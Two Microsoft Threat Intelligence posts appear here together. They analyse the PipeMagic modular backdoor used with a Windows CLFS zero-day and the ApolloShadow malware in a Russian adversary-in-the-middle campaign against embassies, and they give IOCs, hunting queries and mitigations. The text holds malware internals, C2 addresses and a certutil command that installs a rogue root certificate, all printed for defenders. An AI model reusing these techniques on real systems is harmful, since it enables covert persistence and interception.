Microsoft Threat Intelligence encountered PipeMagic as part of research on an attack chain involving the exploitation of CVE-2025-29824, an elevation of privilege vulnerability in Windows Common Log File System (CLFS). We attributed PipeMagic to the financially motivated threat actor Storm-2460, who leveraged the backdoor in targeted attacks to exploit this zero-day vulnerability and deploy ransomware. The observed targets of Storm-2460 span multiple sectors and geographies, including the information technology (IT), financial, and real estate sectors in the United States, Europe, South America, and Middle East. While the impacted organizations remain limited, the use of a zero-day exploit, paired with a sophisticated modular backdoor for ransomware deployment, makes this threat particularly notable.
This blog provides a comprehensive technical deep dive that adds to public reporting, including by ESET Research and Kaspersky. Our analysis reveals the wide-ranging scope of PipeMagic’s internal architecture, modular payload delivery and execution mechanisms, and encrypted inter-process communication via named pipes.
The blog aims to equip defenders and incident responders with the knowledge needed to detect, analyze, and respond to this threat with confidence. As malware continues to evolve and become more sophisticated, we believe that understanding threats such as PipeMagic is essential for building resilient defenses for any organization. By exposing the inner workings of this malware, we also aim to disrupt adversary tooling and increase the operational cost for the threat actor, making it more difficult and expensive for them to sustain their campaigns.
PipeMagic: Technical analysis
PipeMagic has been used by Storm-2460 in multiple instances as part of pre-exploitation activity for attack chains involving CVE-2025-29824. Microsoft Threat Intelligence observed Storm-2460 using the certutil utility to download a file from a legitimate website that was previously compromised to host the threat actor’s malware. The downloaded payload is a malicious MSBuild file that ultimately drops and executes PipeMagic in memory. Once PipeMagic is running, the threat actor performs the CLFS exploit to escalate privileges before launching their ransomware.
The first stage of the PipeMagic infection execution begins with a malicious in-memory dropper disguised as the open-source ChatGPT Desktop Application project. The threat actor uses a modified version of the GitHub project that includes malicious code to decrypt and launch an embedded payload in memory.
The embedded payload is the PipeMagic malware, a modular backdoor that communicates with its C2 server over TCP. Once active, PipeMagic receives payload modules through a named pipe and its C2 server. The malware self-updates by storing these modules in memory using a series of doubly linked lists. These lists serve distinct purposes for staging, execution, and communication, enabling the threat actor to interact and manage the backdoor’s capabilities throughout its lifecycle.
Internal linked list structures
In our analysis, we identified the use of four distinct doubly linked list structures, each serving a unique function within the backdoor’s architecture:
Payload linked list: Stores raw payload modules in each node, representing the initial stage of modular deployment.
Execute linked list: Contains payload modules that have been successfully loaded into memory and are ready for execution.
Network linked list: Contains networking modules responsible for C2 communication.
Unknown linked list: This structure lacks an immediately observable function. Based on behavioral analysis, we hypothesize it is leveraged dynamically by loaded payloads rather than the core backdoor logic itself.
In the next sections, we will detail how each of these linked lists is populated and utilized as we walk through the malware’s execution flow and capabilities.
Populating the payload linked list
The malware uses a doubly linked list structure to manage its payload modules, with each node encapsulating a payload in its raw Windows Portable Executable (PE) format. Before initializing this list, the malware generates a 16-byte random bot identifier unique to the infected host.
Figure 1. Bot ID generation
It then spawns a dedicated thread to establish a named pipe for payload delivery. The pipe is created using the format ‘\\.\pipe\1.<Bot ID hex string>‘, where the bot ID is the randomly generated ID above.
Figure 2. Pipe name generation
A bidirectional named pipe is established, enabling both read and write operations between the malware (acting as the pipe client) and the payload delivery mechanism (pipe server). The malware continuously listens on this pipe, reading incoming payload modules in a loop. For each module, the malware reads the payload’s length from the pipe, allocates memory accordingly, reads the payload content, and adds it to the payload module linked list.
Figure 3. Connecting and reading pipe data
The structure below represents the layout of the pipe data being delivered to the malware from the pipe server.
struct pipe_data_struct
{
DWORD module_setup_flag; // add module node (1) or stop reading pipe (2)
DWORD module_index; // module index
DWORD module_name; // module name
DWORD module_body_len; // length of module data
DWORD module_body_SHA1_hash; // SHA1 hash of module data
BYTE module_body[]; // pointer to module data
};
After the pipe data is read, the malware extracts the module body and decrypts it using RC4 with the following hardcoded 32-byte key:
The malware then computes the SHA-1 hash of the decrypted data and compares it against the hash provided in the pipe data to verify integrity.
Figure 4. Decrypting module data and performing hash validation
Upon successful validation, the malware constructs the following node structure representing the payload module and inserts it at the head of the payload linked list. This same structure is also used later in the execute linked list.
struct __declspec(align(8)) module_node
{
module_node *next; // next node
module_node *prev; // previous node
DWORD module_index; // module index
DWORD exec_ll_module_index; // module index in the execute linked list
BYTE *module_data_ptr; // module pointer
DWORD module_data_len; // module length
DWORD module_name; // module name
int module_entry; // module entrypoint
int module_attribute; // attribute (4: aPLib compressed, 8: RC4 encrypted, 12: both)
BYTE module_initialized_flag; // initialized flag
BYTE *module_hash_ptr; // module SHA1 hash
DWORD module_hash_len; // module SHA1 hash length
};
Figure 5. Populating payload module with pipe data
The malware communicates the result of this operation back to the pipe server using the following response codes:
Code
Description
0x0
Success – module node created and inserted
0x1
Invalid pipe data size
0x3
Failed to create a payload module node
0xA
SHA-1 hashing of module data failed
0xB
Hash mismatch – integrity check failed
This thread remains active throughout the backdoor’s lifecycle, allowing the threat actor to continuously deliver new payloads through the named pipe. The thread only terminates when the malware receives a module setup flag value of 2 in the pipe data, signaling the end of payload delivery.
Malware configuration
The malware uses a well-defined configuration structure to manage its operational parameters.
The outermost configuration is represented by the following structure. It consists of a length field followed by a data buffer of that length:
If the config_len field is the constant 0x5A, the hardcoded configuration is deemed invalid, and the malware simply operates in local execution mode, communicating exclusively with the loopback interface at 127.0.0[.]1:8082. This mode is likely used for testing or staging purposes, allowing the malware to simulate C2 interactions without external network dependencies.
The config_data field itself contains multiple configuration blocks. Each block follows a consistent internal format:
The malware uses the block_index field to identify and retrieve specific configuration blocks as needed. Below is a breakdown of the known block indices and their corresponding data:
Block index
Block description
Block data
1
C2 config block
aaaaabbbbbbb.eastus.cloudapp.azure[.]com:443
2
Unknown
43
3
Backdoor’s max up time
172800
4
Unknown
120
It’s currently unclear how blocks with indices 2 and 4 are used. These values do not appear to influence the malware’s core functionality. However, they are transmitted to the C2 server alongside system information during the initial connection.
The data in block index 1 is itself another configuration block. It contains the actual C2 address used by the malware, which is aaaaabbbbbbb.eastus[.]cloudapp.azure[.]com:443. This domain has been disabled by Microsoft.
Figure 6. Extracting configuration
Launching networking module
The backdoor does not communicate with C2 directly. Instead, it delegates this task to a network module in the network linked list.
First, it populates the network linked list with module nodes. Each node contains an executable module responsible for handling C2 communication.
In the sample analyzed, the network module data is embedded within the backdoor binary. This data is first XOR-decrypted using the following hardcoded 32-byte key, then decompressed using the aPLib compression algorithm.
00000000 91 df 5d 0e 9c 64 cd bd c2 46 f2 4b 6b ce 4a dc |.ß]..dͽÂFòKkÎJÜ|
00000010 aa 38 f9 60 0f e4 e4 98 ed 05 46 f1 ca d9 54 c5 |ª8ù`.ää.í.FñÊÙTÅ|
Figure 7. Decrypting network module data
Using the decrypted module data, the malware populates the following structure representing a module node in the network linked list.
struct network_module_node
{
__int64 module_index; // module index in network linked list
BYTE *module_base; // pointer to module base
__int64 module_size; // module size
__int64 module_main_func; // pointer to the main function
BYTE *module_entrypoint; // pointer to the module's entry point
BYTE terminate_flag; // terminate flag
};
Once the node is initialized and the module is loaded into memory, the malware executes the module’s entry point, passing a pointer to its own main function as a parameter.
Figure 8. Launching network module’s entry point
In the network module’s entry point, the module sets its third argument to its actual main function. This allows the backdoor to assign the module’s main function to the module_main_func field in the node structure, allowing the backdoor to call this function directly.
Figure 9. Network module’s entry point
Finally, the backdoor inserts the module node into the network linked list and invokes its main function, passing the C2 address extracted from the configuration.
Figure 10. Launching network module’s main function
Network module: Establishing C2 connection
When launched by the backdoor, the network module first exports and registers three of its internal functions for use by the backdoor:
A function to send data to the C2 server over TCP
A function that returns the constant value 0x8ca
A function to set a stop signal, instructing both the backdoor and the network module to terminate all C2 communications
The backdoor uses the first exported function to send data to the C2 server through the network module, rather than handling communication directly.
Figure 11. Network module’s exported functions
After initialization, the network module begins its communication routine with the C2 server. On each execution, it limits itself to a maximum of five communication attempts with the C2.
Once a TCP connection is established, the module sends the following HTTP GET request to initiate communication with the C2 server. The path includes a randomly generated 16-character hexadecimal string that is unique for each connection.
Figure 12. Setting up and sending initial GET request
Once a valid response is received from the C2 server, the network module transfers execution back to the backdoor. At this point, the backdoor collects system information and sends it to the C2 server using the network module’s communication function (annotated as C2_send_request in Figure 11).
System information collection
After the C2 connection is successfully established by the network module, the backdoor collects a comprehensive set of system and internal state information to send back to the C2 server:
Generated bot ID
Network module’s index in the network linked list
Operating system version
Computer name
Malware executable name
Malware process ID
Whether the host belongs to the Network Configuration Operators SID group
Domain NetBIOS name
Whether the malware is running as a 64-bit process
List of all LAN domain groups the host belongs to
Integrity level of the malware process
User domain name
Session ID of the malware process
Host’s IP address
Malware’s current working directory
Data from all nodes in the execute linked list
Data from all nodes in the unknown linked list
This host information is commonly collected by backdoors to be used as the host’s unique identifier when the malware attempts to establish a connection with its C2 server. Once this information is gathered, the PipeMagic backdoor invokes the network module’s communication function to transmit the data to the C2 server over the established TCP socket.
After the data is sent, execution is handed back to the network module, which waits for and receives the C2 response.
Finally, the network module transfers control back to the backdoor, passing along the C2 response so the backdoor can proceed with executing its core malicious capabilities.
Processing C2 response
Once the backdoor receives a response from the C2 server, it parses the data to extract the outer processing command. This command determines how the backdoor should handle the response and what actions to take next.
Below is a list of known processing codes and their corresponding functionalities:
Processing code
Processing data
Functionality
0x1
Backdoor code and data
Executes core backdoor functionality using modules from the execute and payload linked lists
0x3
Module index
Looks up a module node with the provided index and execute the module code
0x5
A message
Sends the received message back to the C2 server as an acknowledgment or echo
0x7
N/A
Shuts down the network module and stops all C2 communication
0x8
Backdoor code and data
Executes backdoor functionality using modules from the unknown linked list
0xA
Module node argument
Invokes all modules in the execute linked list with the specified argument
Backdoor capabilities: Execute and payload linked list
Among all the outer processing commands, processing code 0x1 is the most significant. When this code is received, the associated processing data contains inner backdoor commands and arguments that enable PipeMagic to perform a wide range of backdoor operations.
Below is a list of known backdoor codes and their corresponding functionalities:
Backdoor code
Backdoor arguments
Functionality
0x1
N/A
Retrieves metadata from all module nodes in the payload linked list
0x2
arg1: Module index arg2: Module data length arg3: Module name arg4: Module attribute arg5: Module SHA1 hash
Inserts a new module node into the payload linked list and initializes it with the provided data; Skips insertion if a matching module (by index and hash) already exists
0x3
arg1: Module index arg2: Hash flag arg3: Write offset arg4: Write length arg5: Payload data
Locates a module node in the payload linked list using the provided index and writes data at the specified offset; if the hash flag is provided, recomputes and updates the SHA-1 hash after RC4 encryption and aPLib compression (depending on the module’s attribute)
0x4
arg1: Module index arg2: Read offset arg3: Read length
Reads a segment of data from a module node in the payload linked list
0x5
arg1: Module index
Deletes a module node from the payload linked list
0x6
arg1: Module index arg2: Write offset arg3: Payload data arg4: Write length
Writes data to a module node without updating the SHA-1 hash
0x7
arg1: Module index
Retrieves the SHA-1 hash of a module node in the payload linked list
0x9
N/A
Retrieves data from all module nodes in the execute linked list
0xA
arg1: Module index
Retrieves data from a specific module node in the execute linked list
0xB
arg1: Payload module index arg2: Execute module index arg3: Initialization flag
Loads a payload module into memory and binds it to a node in the execute linked list, then invokes its entry point
0xC
arg1: Module index
Executes the entry point of a module node in the execute linked list
0xD
N/A
Retrieves the user’s domain name
0xE
N/A
Retrieves the current C2 processing code and data
0xF
N/A
Renames the malware executable to “:fuckit” and marks it for self-deletion
0x10
arg1: Lower index arg2: Upper index
Deletes all module nodes in the payload linked list within the specified index range
0x11
arg1: Module name
Deletes a module node in the payload linked list by name instead of index
0x13
N/A
Enumerates all running processes and collects session ID, PID, PPID, creation time, executable path, user domain, and architecture (32-bit or 64-bit)
0x14
arg1: Module index arg2: New module name arg3: Module hash length arg4: Module hash arg5: Pipe data to send arg6: Pipe name arg7: Max elapsed time
Replaces a module node in the payload linked list; sends data to a named pipe and parses the response to receive the payload module data
0x15
arg1: Module index arg2: New module name arg3: New module attribute arg4: Module hash length arg5: Module hash arg6: Module data length arg7: Module data
Replaces a module node in the payload linked list with a new one; the provided data is RC4-decrypted, aPLib-decompressed, and validated by SHA-1 hash before being added to the payload module node
0x16
N/A
Recollects system information (same as the initial C2 handshake)
0x17
arg1: Module index arg2: Pipe data 1 arg3: Pipe data 2 arg4: Max elapsed time arg5: Pipe name
Extracts and RC4-encrypts data from a module in the payload linked list; sends it to a named pipe along with the provided pipe data.
Backdoor results are delivered to C2 over TCP. These inner backdoor codes provide the threat actor with granular control over module management, execution, and system reconnaissance, making PipeMagic a highly modular and extensible backdoor.
Backdoor capabilities: Unknown linked list
Processing code 0x8 functions similarly to processing code 0x1 in that it also contains inner backdoor code and data. However, this command is specifically designed to interact with the unknown linked list.
The purpose of this linked list remains unclear. It does not appear to play a critical role in the malware’s core functionality on the infected system. Below is a list of known backdoor codes associated with this processing command and their corresponding functionalities:
Backdoor code
Backdoor arguments
Functionality
0x1
N/A
Retrieves metadata from all module nodes in the unknown linked list
0x2
arg1: Module index
Looks up a module node in the unknown linked list and extract its data
0x3
arg1: Module index
Deletes a module node from the unknown linked list using the specified index
0x7
arg1: Module index arg2: New module size
Resizes the data buffer of a module node in the unknown linked list, either expanding or shrinking it based on the provided size
While the exact role of this list remains unclear, its structure and command handling mirror those of the payload and execute linked lists, suggesting it may serve as a staging area or auxiliary buffer for dynamically loaded modules.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
PipeMagic (Win32/64)
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
‘PipeMagic’ malware was detected
‘PipeMagic’ malware was prevented
An active ‘PipeMagic’ malware was blocked
An active ‘PipeMagic’ malware process was detected while executing and terminated
The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.
A file or network connection related to a ransomware-linked emerging threat activity group detected
Microsoft Defender Vulnerability Management
Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:
CVE-2025-29824
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
Microsoft Threat Intelligence has uncovered a cyberespionage campaign by the Russian state actor we track as Secret Blizzard that has been targeting embassies located in Moscow using an adversary-in-the-middle (AiTM) position to deploy their custom ApolloShadow malware. ApolloShadow has the capability to install a trusted root certificate to trick devices into trusting malicious actor-controlled sites, enabling Secret Blizzard to maintain persistence on diplomatic devices, likely for intelligence collection. This campaign, which has been ongoing since at least 2024, poses a high risk to foreign embassies, diplomatic entities, and other sensitive organizations operating in Moscow, particularly to those entities who rely on local internet providers.
While we previously assessed with low confidence that the actor conducts cyberespionage activities within Russian borders against foreign and domestic entities, this is the first time we can confirm that they have the capability to do so at the Internet Service Provider (ISP) level. This means that diplomatic personnel using local ISP or telecommunications services in Russia are highly likely targets of Secret Blizzard’s AiTM position within those services. In our previous blog, we reported the actor likely leverages Russia’s domestic intercept systems such as the System for Operative Investigative Activities (SORM), which we assess may be integral in facilitating the actor’s current AiTM activity, judging from the large-scale nature of these operations.
This blog provides guidance on how organizations can protect against Secret Blizzard’s AiTM ApolloShadow campaign, including forcing or routing all traffic through an encrypted tunnel to a trusted network or using an alternative provider—such as a satellite-based connection—hosted within a country that does not control or influence the provider’s infrastructure. The blog also provides additional information on network defense, such as recommendations, indicators of compromise (IOCs), and detection details.
Secret Blizzard is attributed by the United States Cybersecurity and Infrastructure Agency (CISA) as Russian Federal Security Service (Center 16). Secret Blizzard further overlaps with threat actors tracked by other security vendors by names such as VENOMOUS BEAR, Uroburos, Snake, Blue Python, Turla, Wraith, ATG26, and Waterbug.
As part of our continuous monitoring, analysis, and reporting of the threat landscape, we are sharing our observations on Secret Blizzard’s latest activity to raise awareness of this actor’s tradecraft and educate organizations on how to harden their attack surface against this and similar activity. Although this activity poses a high risk to entities within Russia, the defense measures included in this blog are broadly applicable and can help organizations in any region reduce their risk from similar threats. Microsoft is also tracking other groups using similar techniques, including those documented by ESET in a previous publication.
AiTM and ApolloShadow deployment
In February 2025, Microsoft Threat Intelligence observed Secret Blizzard conducting a cyberespionage campaign against foreign embassies located in Moscow, Russia, using an AiTM position to deploy the ApolloShadow malware to maintain persistence and collect intelligence from diplomatic entities. An adversary-in-the-middle technique is when an adversary positions themself between two or more networks to support follow-on activity. The Secret Blizzard AiTM position is likely facilitated by lawful intercept and notably includes the installation of root certificates under the guise of Kaspersky Anti-Virus (AV). We assess this allows for TLS/SSL stripping from the Secret Blizzard AiTM position, rendering the majority of the target’s browsing in clear text including the delivery of certain tokens and credentials. Secret Blizzard has exhibited similar techniques in past cyberespionage campaigns to infect foreign ministries in Eastern Europe by tricking users to download a trojanized Flash installer from an AiTM position.
Initial access
In this most recent campaign, the initial access mechanism used by Secret Blizzard is facilitated by an AiTM position at the ISP/Telco level inside Russia, in which the actor redirects target devices by putting them behind a captive portal. Captive portals are legitimate web pages designed to manage network access, such as those encountered when connecting to the internet at a hotel or airport. Once behind a captive portal, the Windows Test Connectivity Status Indicator is initiated—a legitimate service that determines whether a device has internet access by sending an HTTP GET request to hxxp://www.msftconnecttest[.]com/redirect which should direct to msn[.]com.
Delivery and installation
Once the system opens the browser window to this address, the system is redirected to a separate actor-controlled domain that likely displays a certificate validation error which prompts the target to download and execute ApolloShadow. Following execution, ApolloShadow checks for the privilege level of the ProcessToken and if the device is not running on default administrative settings, then the malware displays the user access control (UAC) pop-up window to prompt the user to install certificates with the file name CertificateDB.exe, which masquerades as a Kaspersky installer to install root certificates and allow the actor to gain elevated privileges in the system.
Figure 1. Secret Blizzard AiTM infection chain
ApolloShadow malware
ApolloShadow uses two execution paths depending on the privilege level of the running process. The token of the running process is retrieved using the API GetTokenInformationType and the value of TokenInformation is checked to see if the token contains the TokenElevationTypeFulltype. If it does not have that privilege level, ApolloShadow executes a low privilege execution path.
Figure 2. ApolloShadow execution flow
Low privilege execution
When executing the low privilege path, the first action is to collect information about the host to send back to the AiTM controlled command and control (C2). First, the host’s IP information is collected using the API GetIpAddrTable, which collects information from the IpAddrTable. Each entry is individually Base64-encoded and delineated by a pipe character with \r\n appended, then combined into one string. For example:
The encoded network information is added as a query string to a GET request with the destination URL hxxp://timestamp.digicert[.]com/registered. Two query parameters are included with the request, code and t. The Code parameters contains a hardcoded set of characters and the t variable has the encoded IP address information, as shown below:
While the timestamp subdomain does exist for Digicert, the /registered resource does not. Due to the AiTM position of the actor, Secret Blizzard can use DNS manipulation to redirect legitimate-looking communication to the actor-controlled C2 and return an encoded VBScript as the second-stage payload.
When the response comes back from the redirected Digicert request, the file name that is used to write the script to disk is decoded for use. ApolloShadow uses string obfuscation in several places throughout the binary to hide critical strings. These strings are blocks of encoded characters that are encoded using XOR with a separate set of hardcoded constants. While this is not a particularly sophisticated technique, it is enough to obscure the strings from view at first glance. The strings are decoded as they are used and then re-encoded after use to remove traces of the strings from memory.
Figure 2. String decoding operation for VB script name
The decoded file name is edgB4ACD.vbs and the file name string is concatenated by the malware with the results of querying the environment variable for the TEMP directory to create the path for the target script. We were unable to recover the script, but the header of the response is checked for the first 12 characters to see if it matches the string MDERPWSAB64B. Once ApolloShadow has properly decoded the script, it executes the script using the Windows API call CreateProcessW with the command line to launch wscript and the path to edgB4ACD.vbs.
Finally, the ApolloShadow process launches itself again using ShellExecuteA, which presents the user with an UAC window to bypass UAC mechanisms and prompt the user to grant the malware the highest privileges available to the user.
Figure 3. UAC popup to request elevated privileges from the user
Elevated privilege execution
When the process is executed with sufficient elevated privileges, ApolloShadow alters the host by setting all networks to Private. This induces several changes including allowing the host device to become discoverable, and relaxing firewall rules to enable file sharing. While we did not see any direct attempts for lateral movement, the main reason for these modifications is likely to reduce the difficulty of lateral movement on the network. ApolloShadow uses two different methods to perform this change.
The first method is through the registry settings for NetworkProfiles: SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles. The network’s globally unique identifiers (GUIDs) are parsed for each connected network, and the malware modifies the value Category by setting it to 0. This change sets the profile of the network to Private after the host has been rebooted.
Figure 4. Registry settings for network profiles
The second method directly sets firewall rules using Component Object Model (COM) objects that enable file sharing and turn on network discovery. Several strings are decoded using the same method as above and concatenated to create the firewall rules they want to modify.
FirewallAPI.dll,-32752
This command enables the Network Discovery rule group
FirewallAPI.dll,-28502
This command enables all rules in the File and Printer Sharing group
The strings are passed to the COM objects to enable the rules if they are not already enabled.
Figure 5. COM objects used to modify firewall rules
Both techniques have some crossover, but the following table provides a comparison overview of each method.
Technique
Purpose
Timing
Stealth
Effect
Registry profile change
Sets network to Private
Requires reboot
High
Broadly relaxes firewall posture
COM-based rule enablement
Activates specific rules
Immediate
Moderate
Opens precise ports for discovery and sharing
From here, ApolloShadow presents the user with a window showing that the certificates are being installed.
Figure 6. Window displayed to the user during execution
A new thread performs the remainder of the functionality. The two root certificates being installed are written to the %TEMP% directory with a temporary name and the extension crt. The certificate installation is performed by using the Windows certutil utility and the temporary files are deleted following the execution of the commands.
certutil.exe -f -Enterprise -addstore ca "C:\Users\<username>\AppData\Local\Temp\crt53FF.tmp"
The malware must add a preference file to the Firefox preference directory because Firefox uses different certificate stores than browsers such as Chromium, which results in Firefox not trusting the root and enterprise store by default. ApolloShadow reads the registry key that points to the installation of the application and builds a path to the preference directory from there. A file is written to disk called wincert.js containing a preference modification for Firefox browsers, allowing Firefox to trust the root certificates added to the operating system’s certificate store.
The final step is to create an administrative user with the username UpdatusUser and a hardcoded password on the infected system using the Windows API NetUserAdd. The password is also set to never expire.
Figure 7. Administrator user added to infected system
ApolloShadow has successfully installed itself on the infected host and has persistent access using the new local administrator user.
Defending against Secret Blizzard activity
Microsoft recommends that all customers, but especially sensitive organizations operating in Moscow, should implement the following recommendations to mitigate against Secret Blizzard activity.
Route all traffic through an encrypted tunnel to a trusted network or use a virtual private network (VPN) service provider, such as a satellite-based provider, whose infrastructure is not controlled or influenced by outside parties.
Microsoft also recommends the following guidance to enhance protection and mitigate potential threats:
Practice the principle of least privilege, use multifactor authentication (MFA), and audit privileged account activity in your environments to slow and stop attackers. Avoid the use of domain-wide, admin-level service accounts and restrict local administrative privileges. These mitigation steps reduce the paths that attackers have available to them to accomplish their goals and lower the risk of the compromise spreading in your environment.
Regularly review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Threat actors may add accounts to these groups to maintain persistence and disguise their activity.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.
Run endpoint detection and response (EDR) in block mode, so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Turn on attack surface reduction rules to prevent common attack techniques. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against common attack vectors.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.
Secret Blizzard Actor activity detected
Suspicious root certificate installation
Suspicious certutil activity
User account created under suspicious circumstances
A script with suspicious content was observed
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Surface devices that attempt to download a file within two minutes after captive portal redirection. This activity may indicate a first stage AiTM attack—such as the one utilized by Secret Blizzard—against a device.
let CaptiveRedirectEvents = DeviceNetworkEvents
| where RemoteUrl contains "msftconnecttest.com/redirect"
| project DeviceId, RedirectTimestamp = Timestamp, RemoteUrl;
let FileDownloadEvents = DeviceFileEvents
| where ActionType == "FileDownloaded"
| project DeviceId, DownloadTimestamp = Timestamp, FileName, FolderPath; CaptiveRedirectEvents
| join kind=inner (FileDownloadEvents) on DeviceId
| where DownloadTimestamp between (RedirectTimestamp .. (RedirectTimestamp + 2m))
| project DeviceId, RedirectTimestamp, RemoteUrl, DownloadTimestamp, FileName, FolderPath
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.
Detect network IP and domain indicators of compromise using ASIM
The below query checks IP addresses and domain indicators of compromise (IOCs) across data sources supported by ASIM Network session parser.
//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["45.61.149.109"]);
let ioc_domains = dynamic(["kav-certificates.info"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect network and files hashes indicators of compromise using ASIM
The below queries will check IP addresses and file hash IOCs across data sources supported by ASIM Web session parser.
Detect network indicators of compromise and domains using ASIM
//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["45.61.149.109"]);
let ioc_sha_hashes =dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
// Domain list - _Im_WebSession
let ioc_domains = dynamic(["kav-certificates.info"]);
_Im_WebSession (url_has_any = ioc_domains)
Detect files hashes indicators of compromise using ASIM
The below query will check IP addresses and file hash IOCs across data sources supported by ASIM FileEvent parser.
Detect network and files hashes indicators of compromise using ASIM
// file hash list - imFileEvent
let ioc_sha_hashes =dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]);
imFileEvent
| where SrcFileSHA256 in (ioc_sha_hashes) or
TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'')[1]),
AccountNTDomain = tostring(split(User, @'')[0])
| extend AlgorithmType = "SHA256"
Indicators of compromise
Indicator
Type
Description
kav-certificates[.]info
Domain
Actor-controlled domain that downloads the malware
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
